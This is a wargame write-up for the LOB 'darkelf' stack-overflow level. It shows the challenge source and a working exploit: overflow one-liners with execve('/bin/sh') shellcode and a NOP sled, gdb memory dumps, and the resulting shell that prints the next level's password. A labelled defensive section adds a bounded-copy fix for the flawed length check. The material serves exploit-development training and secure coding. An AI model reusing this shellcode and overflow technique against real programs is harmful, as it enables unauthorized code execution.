[LOB] wolfman -> darkelf
2019. 7. 28. 23:57 · Wargame & CTF/LOB
```c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen, strcpy: missing from the original listing */

extern char **environ;

int main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // egghunter: wipe every environment string so nothing survives there
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    // argv[1][47] lands on the top byte of the saved return address; it must be 0xbf
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // check the length of argument (48 is still allowed, but buffer is only 40)
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    // buffer hunter: zero the local buffer after use
    memset(buffer, 0, 40);
}
```
The length of argv[1] is checked: it must not be longer than 48 characters.
[buffer(40)][SFP(4)][RET(4)]
Because buffer is zeroed out afterwards (the "buffer hunter"), this time too the shellcode goes into argv[2].
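The length check in darkelf is the defender-side lesson of this level: it bounds argv[1] at 48 bytes while the destination buffer is only 40, so the check is measured against the wrong size and 41..48-byte inputs still reach SFP and RET. The C below is an added example, not code from the original post or the LOB challenge. It reimplements the copy with a bound taken from the real destination size and keeps a model of the original predicate next to it so the two can be compared; the names copy_arg_bounded, darkelf_accepts and check_is_insufficient are my own.

```c
/* Added example: bounded replacement for darkelf's "strlen > 48" check + strcpy.
 * Not part of the original challenge source. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 40   /* same local buffer size as darkelf */

/* Copy src into dst only if it fits together with its NUL terminator.
 * Returns 0 on success, -1 if src is too long (dst is left untouched).
 * The scan never reads past dstsize bytes of src, so an unterminated
 * input cannot make the length computation itself run off the end. */
int copy_arg_bounded(char *dst, size_t dstsize, const char *src)
{
    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;

    size_t len = 0;
    while (len < dstsize && src[len] != '\0')
        len++;
    if (len == dstsize)          /* no room for the terminator: reject */
        return -1;

    memcpy(dst, src, len + 1);   /* copies the NUL as well */
    return 0;
}

/* Model of darkelf's original predicate: accepted unless strlen > 48.
 * Returns 1 if the challenge binary would accept the input. */
int darkelf_accepts(const char *src)
{
    return strlen(src) <= 48;
}

/* Returns 1 when an input of this length passes darkelf's check but
 * strcpy would still write past the 40-byte buffer (len + 1 for the NUL). */
int check_is_insufficient(size_t len)
{
    return len <= 48 && len + 1 > BUF_SIZE;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    /* sizeof buffer, not a hand-maintained constant, is the bound */
    if (copy_arg_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        printf("argument is too long!\n");
        return 1;
    }
    printf("%s\n", buffer);
    memset(buffer, 0, sizeof buffer);
    return 0;
}
```

check_is_insufficient reports 1 for every length from 40 through 48, which is exactly the window the original check leaves open; copy_arg_bounded rejects all of them because its bound is derived from the destination rather than from a number chosen separately.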
```
[wolfman@localhost tmp]$ ./darkelf `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost tmp]$ gdb -q darkelf core
Core was generated by `./darkelf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffff6c0:     0x00000000      0xbffff704      0xbffff714      0x40013868
0xbffff6d0:     0x00000003      0x08048450      0x00000000      0x08048471
0xbffff6e0:     0x08048500      0x00000003      0xbffff704      0x08048390
0xbffff6f0:     0x0804864c      0x4000ae60      0xbffff6fc      0x40013e90
0xbffff700:     0x00000003      0xbffff813      0xbffff81d      0xbffff84e
0xbffff710:     0x00000000      0xbffffc50      0xbffffc66      0xbffffc7e
0xbffff720:     0xbffffc9d      0xbffffcbf      0xbffffcd1      0xbffffcde
0xbffff730:     0xbffffea1      0xbffffec0      0xbffffeda      0xbffffeef
0xbffff740:     0xbfffff04      0xbfffff0f      0xbfffff28      0xbfffff38
0xbffff750:     0xbfffff40      0xbfffff51      0xbfffff5f      0xbfffff6d
0xbffff760:     0xbfffff7e      0xbfffff8c      0xbfffff97      0xbfffffaa
0xbffff770:     0xbfffffe6      0x00000000      0x00000003      0x08048034
0xbffff780:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffff790:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffff7a0:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffff7b0:     0x0000000b      0x000001f9      0x0000000c      0x000001f9
0xbffff7c0:     0x0000000d      0x000001f9      0x0000000e      0x000001f9
0xbffff7d0:     0x00000010      0x0f8bfbff      0x0000000f      0xbffff80e
0xbffff7e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff7f0:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0xbffff800:     0x00000000      0x00000000      0x00000000      0x36690000
0xbffff810:     0x2e003638      0x7261642f      0x666c656b      0x41414100
0xbffff820:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff830:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff840:     0x41414141      0x41414141      0xbfbfbf41      0x909000bf
0xbffff850:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff860:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff870:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff880:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff890:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8d0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff900:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff910:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff920:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff930:     0x90909090      0x90909090      0x90909090      0x90909090
```
As before, a NOP sled is used.
```
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\x01\xf9\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
bash$ my-pass
euid = 506
kernel crashed
```
darkelf : kernel crashed